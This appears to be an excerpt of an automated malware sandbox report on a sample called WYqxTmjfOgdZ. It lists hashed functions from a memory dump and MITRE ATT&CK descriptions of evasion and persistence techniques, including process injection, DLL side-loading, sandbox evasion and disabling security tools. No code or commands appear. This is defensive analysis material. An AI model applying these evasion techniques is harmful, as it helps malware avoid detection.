Instruction ID: 7aa779c732efa75bc5a56d4f78639bd0f186805971766d611d58e54fe879d101
Opcode Fuzzy Hash: 739c4439e519c72bd7f8c1cdd8b52b8204b7daa1c6079e3ed9d5088c413c69e0
Instruction Fuzzy Hash: 7E712A34700645CFDB15DF2CC898A697BE5EF89218F9940A9E942CB3B1DB72DC41CBA0

Function 013ACEC7 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09ffc6c81aa4a247a46e114e5a485054952ad1c5bc2d675713d73c942714276
Instruction ID: aa2df5895d9747789b45a36ef8bd8a0c1f44ef506a875d051e808368a7cd60d9
Opcode Fuzzy Hash: a09ffc6c81aa4a247a46e114e5a485054952ad1c5bc2d675713d73c942714276
Instruction Fuzzy Hash: FB51BAB0473242AFE3102B24F6AE57ABFB5EB0F3277456D44B40E85499CFB16489CB61

Function 013ACED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c54f4fcc9bc828c8fb6289b82face9de6aac3e9921dbc09bbd06bbba70e6d85
Instruction ID: 04c5b8c539b62c19be94472b4a57bbb6f2f61ca445c4499cf42e9cc78e2f0257
Opcode Fuzzy Hash: 3c54f4fcc9bc828c8fb6289b82face9de6aac3e9921dbc09bbd06bbba70e6d85
Instruction Fuzzy Hash: 1951AAB0473242AFE2102B24F6AE53ABFB9FB0F3277456D04B40E85499CFB16485CB60

Function 013ACD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2848da479fe9ba0185ddf39f0f16b8d77b06982686b2d4fcc89d1b2111c8e1c
Instruction ID: a4f2567f1e481f9f0f24aa3a815a457d672a330fbd2c494a0eb8168fd904ef99
Opcode Fuzzy Hash: d2848da479fe9ba0185ddf39f0f16b8d77b06982686b2d4fcc89d1b2111c8e1c
Instruction Fuzzy Hash: EC518175E11208DFDB54DFA9D98499DBBF2FF89300F24816AE419AB364DB30A901CF50

Function 013A3908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3fa42bb776d381e6e5616828bef9af2fda87d6ab63b5de425143278c56553e
Instruction ID: dd4a6e51b5395728b9046c16ef214ed9508e689bbca5d732b4c8dad3d6b98e83
Opcode Fuzzy Hash: 9b3fa42bb776d381e6e5616828bef9af2fda87d6ab63b5de425143278c56553e
Instruction Fuzzy Hash: E551A274E01208DFCB08DFA9D49499DBBB6FF8D300B60956AE805AB324DB31AC45CF50

Function 013A9A63 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09caaa79ee34b17ee52bd2148d374074ee386194ad09da56d8e140f37f649473
Instruction ID: 0dffad42b4edc6a125c38bd00e0d2794c82b0a77872bd3b339c8f7ad3a11e977
Opcode Fuzzy Hash: 09caaa79ee34b17ee52bd2148d374074ee386194ad09da56d8e140f37f649473
Instruction Fuzzy Hash: 1541CE31A04249DFDF16CFA8C844B9EBFB2EF49318F448556E915AF2A1D334E950CBA0

Function 013AA650 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcedadb4b0a85d616169ca663e2c030b6a329a86c10ff42c0c11b02f1435afdb
Instruction ID: 5b4815eb9946a627659ca7eb62fa5d5ef92add8287f8672e868d4ca640b9624c
Opcode Fuzzy Hash: dcedadb4b0a85d616169ca663e2c030b6a329a86c10ff42c0c11b02f1435afdb
Instruction Fuzzy Hash: E141F2367112048FDB159BB8D9586AE7FF6FFC8220F148469E506E7390DE319C46CBA0

Function 013A3428 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d601c382b71d8d4b23a87738cdc572d94d71694421548b473da42ff7dba1a1
Instruction ID: cef971518dd0f4fe64cab18b127590a553149fd55481f5ec9d3052593aaf6271
Opcode Fuzzy Hash: 40d601c382b71d8d4b23a87738cdc572d94d71694421548b473da42ff7dba1a1
Instruction Fuzzy Hash: 6D313975B003188BEF198AAE599937E66EAFBC4718F884039D846E7380DF74CC0582A1

Function 013A6730 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4929b9e72f604ba05ccaa9625aa0ab08ea963e5518ce5ec7cb294ac5fc7f7a77
Instruction ID: 8d19c12e1ec84dd435959c6d7a84fd60d74e38975ac931336a0862f8bcce99cb
Opcode Fuzzy Hash: 4929b9e72f604ba05ccaa9625aa0ab08ea963e5518ce5ec7cb294ac5fc7f7a77
Instruction Fuzzy Hash: CF41B1B1A00208DFDB15CF68C805BAA7FBAEB44314F49842AE41597241DB75DD84CBA1

Function 013A4DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf71ce8a94b0e72bb09fd3be8b675bc793b7f5dc657c5650c6f96f6ef7510244
Instruction ID: 43f0b46cac00f58756756696705cb4bb5d4a27a8bcfc793380d35407f80f1d95
Opcode Fuzzy Hash: bf71ce8a94b0e72bb09fd3be8b675bc793b7f5dc657c5650c6f96f6ef7510244
Instruction Fuzzy Hash: 1131A03121510A9FDB059F68D494AAF7FB6FF48215F448419FA098B281CB78DD61CBA0

Function 013A76E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc151188e1d4fdf27d40841cfb2e6d4b5f9bf25369a2183df236b16e12704c9
Instruction ID: ddff9ad0c39616faff82b22049b8951a068ba88ea645fb7ec45a5b3ca03460b7
Opcode Fuzzy Hash: dcc151188e1d4fdf27d40841cfb2e6d4b5f9bf25369a2183df236b16e12704c9
Instruction Fuzzy Hash: 3B21B3383142044BEB25162A88D4A7E7E9BEFC4B1DF544078E502CB795EE2BCC8197A0

Function 013AA809 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac20fb0f9bbd68068bbee38900b2064edecde79e3d5fa95d67d26de9186b3ef2
Instruction ID: a0ab1442b391cf61979257f8f0790d98faddd3b0eb75b982cbdefb03ce60520a
Opcode Fuzzy Hash: ac20fb0f9bbd68068bbee38900b2064edecde79e3d5fa95d67d26de9186b3ef2
Instruction Fuzzy Hash: D131A072E102098FCB04CF6DC884AAEBBF6FF84764B158659E515D73A5CB34AC42CB90

Function 013AD11F Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8705559f89fda9905e25f51c24747761fb1b1de699d43e4f5d129336935b16b5
Instruction ID: dc5735a18aeb41f68982fabf39ec68c2a5f55cfe1f8e0b90800a4acc11f287b5
Opcode Fuzzy Hash: 8705559f89fda9905e25f51c24747761fb1b1de699d43e4f5d129336935b16b5
Instruction Fuzzy Hash: 92215731C10209CECF11EFE8E9486EDBBB4EF4A305F819619E504B7254EB30AA5ACB50

Function 013A2060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe5a362e4f05244ba525303b97bfe10fe43c2d369b886c5be7f8709da760f10
Instruction ID: a2bc29199802f6f99e17ad4b88331c255ae79cb142a728916cb57a62847327fb
Opcode Fuzzy Hash: cfe5a362e4f05244ba525303b97bfe10fe43c2d369b886c5be7f8709da760f10
Instruction Fuzzy Hash: E121AE35A00108AFCF14DF78C8509AF7BBAEB98760B51C419D81A8B340DB35EE42CBE1

Function 013A5A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea3b0e45b45b73c40d6b8b677284c0cbb5abe4e3d46bbe8047bc8b412e89aad9
Instruction ID: 02d3652cb299c5f50f908b03ef28166cd16a9c157a50da959b5a4be2baafff81
Opcode Fuzzy Hash: ea3b0e45b45b73c40d6b8b677284c0cbb5abe4e3d46bbe8047bc8b412e89aad9
Instruction Fuzzy Hash: 6C2108317116118FE7269B29D4A452FBBA6FF88725B454169E906CB380CF34DC02CBD0

Function 013A215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f6448d0032f7115e069fbfe260dd7c159fa4339b3b719005da2d8ed6a6f2bc2
Instruction ID: 69b2ddfdb58a22bb97122085e7daf7e3c5da639f8d52d70162a5e5ae8ff82237
Opcode Fuzzy Hash: 5f6448d0032f7115e069fbfe260dd7c159fa4339b3b719005da2d8ed6a6f2bc2
Instruction Fuzzy Hash: 20113B36E4424D9BCB019BB89C005DEBB34FF9A314B258756D666B7191EA312906C391

Function 013A39ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415dfa71cd66931e80574ed68a47abb20647c4124e91f98a3f47a6648bc8b272
Instruction ID: 9860ebc0fd1b68858a8f2af5ef42cf2d8f891729cb6718bd4e7a8aa77d96d6fc
Opcode Fuzzy Hash: 415dfa71cd66931e80574ed68a47abb20647c4124e91f98a3f47a6648bc8b272
Instruction Fuzzy Hash: A031B378E01308DFCB04EFA8E5949ADBBB6FF49310B21446AE809AB324D731AC05CF50

Function 013AD218 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9d33451d3cc09fe60043a07d298483eea5ae047322f93844d8118f7a873811
Instruction ID: c66a2feaf0cf4c20121360a9e48ce04207c9c6c6c434a8b963a53349efec9915
Opcode Fuzzy Hash: ba9d33451d3cc09fe60043a07d298483eea5ae047322f93844d8118f7a873811
Instruction Fuzzy Hash: D5213535A01209CFCB09EBB4E854AAEB7B2FB8A305F105429C40573294CB359946CF25

Function 013A4DBB Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba18bd15cd67c619c601afd8b7bfdfe8ac9fcc3b6df751d419fb64df22a2f8e7
Instruction ID: 2b3397c2416b4d035f9acacb912418e782a75d7aaed95b2531dadfb8f8943f8b
Opcode Fuzzy Hash: ba18bd15cd67c619c601afd8b7bfdfe8ac9fcc3b6df751d419fb64df22a2f8e7
Instruction Fuzzy Hash: 5B21D231619209DFDB15DF68E444B6B7BA6FB48725F448429FA098B281CB78DC91CBE0

Function 013AD228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7195288d4c2344ce7cf11e1ae49da8bde1a7061c9c2bd806d1220111763df56
Instruction ID: ffd349f89f51bfb6c3fca2364c89cc69120eabb5606230076da31e706a7a94e2
Opcode Fuzzy Hash: d7195288d4c2344ce7cf11e1ae49da8bde1a7061c9c2bd806d1220111763df56
Instruction Fuzzy Hash: 92210635901208DBDF09EBB4E854AEDB7B6FB8A304F109429C40573394CB35A846CF65

Function 013A1F61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf77453aa9b1d1a4c019e9b9a9e7ed95afd7404ff46af7a2b13c776429fd794
Instruction ID: 0e82c2ca6112ce9865f46c488319ab03fd304c94891103cfd2c2b27583df0fa4
Opcode Fuzzy Hash: 6bf77453aa9b1d1a4c019e9b9a9e7ed95afd7404ff46af7a2b13c776429fd794
Instruction Fuzzy Hash: 5E21E475C1220D9FDB00EFA8D8456EEBFF5FB49300F50422AE805B3250EB345A95CBA1

Function 013A1F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54b37e03fd8d17b631a95a01d87ec518a5f9a9c942d16ddd4049e737ed3a60b
Instruction ID: c001da97b960d89ee0888502cddb3ba64374e52dd29ef670efcf050b4ba894c5
Opcode Fuzzy Hash: f54b37e03fd8d17b631a95a01d87ec518a5f9a9c942d16ddd4049e737ed3a60b
Instruction Fuzzy Hash: AD213074C0520D8FDB00EFA8D4885EEBFB0FF4A314F10426AE801B7290EB305A85CBA1

Function 013A5607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63cffa47cfc515441259a6c09843e77a1509f677e222ceca05eda00e1735a45
Instruction ID: 81fee356d62d6d224702b7f97c7e06d694223a255f59f240cbb527f84159ce13
Opcode Fuzzy Hash: a63cffa47cfc515441259a6c09843e77a1509f677e222ceca05eda00e1735a45
Instruction Fuzzy Hash: 3F0128727010056FDB05CE68E840BBF3BAAEFD8661F188029F504D7280CE7588028BA0

Function 013A2010 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e0c0cb8538528120e1a389454f464f8918f7c2f12c2502c203c139170988de
Instruction ID: 30b3b473f27a1b9a79e228c27f5b202ac0122f9994b2c67049ac4e3feafd9d8d
Opcode Fuzzy Hash: 88e0c0cb8538528120e1a389454f464f8918f7c2f12c2502c203c139170988de
Instruction Fuzzy Hash: 9DE08636D1122A67CB01A6A5DC05ADFBB78EF92710F844621E42033541EB74276982F0

Function 013A2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3b57abef0c4331719ccb811b6bce1f305db714f7cd0ab2885246c730ce2da2
Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
Opcode Fuzzy Hash: 9d3b57abef0c4331719ccb811b6bce1f305db714f7cd0ab2885246c730ce2da2
Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1

Function 013A8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 7b9641de2c027f17644097586199ebb1a5f275cbe81a7b0b70d17ada6ad882c2
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 90C08C3720D1282EE63A108F7C40EB3BB8CC3C23FAA6501B7F95CE3240A8429C8001F8

Function 013AA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64dbcf37aef888ae343058b82087466aa713f4b3726c69b73ad7c2ff708c3228
Instruction ID: ef77c1cf2c55d71f9653d06201fe7c9988f392439f866a5cf5b2278c9c740a32
Opcode Fuzzy Hash: 64dbcf37aef888ae343058b82087466aa713f4b3726c69b73ad7c2ff708c3228
Instruction Fuzzy Hash: 0CD0677AB11008AFDB04DF98E8409DDF7B6FB9C221B048156F915A3260C6319961DB60

Function 013A5EA8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db985091d729243d5ab8bcf15812ab3fa2e9a3abf2ba4891c02205a6b79f8d0
Instruction ID: 02155c0fa0bc29d6ba9b02a90551da43cbeff25a499a1adad9670be8e92a35fe
Opcode Fuzzy Hash: 7db985091d729243d5ab8bcf15812ab3fa2e9a3abf2ba4891c02205a6b79f8d0
Instruction Fuzzy Hash: 0CD02B70135341CBD305F734EB144153B36BED0504F044E8AA4044C419DB785C084322

Function 013A5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1691569172.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_13a0000_WYqxTmjfOgdZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59fa62477482bf5466e76d193389a24461c8ef0ea133a1729968f012e3b886f3
Instruction ID: dc391a9310ab1edfc4cb594e03528a391ecf73e09d8eb0b36252538821728fda
Opcode Fuzzy Hash: 59fa62477482bf5466e76d193389a24461c8ef0ea133a1729968f012e3b886f3
Instruction Fuzzy Hash: 77C0123013170A8BD605FB75EE49A55333E7AC0514F448E11B1094D11DDFB87C4447A5

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
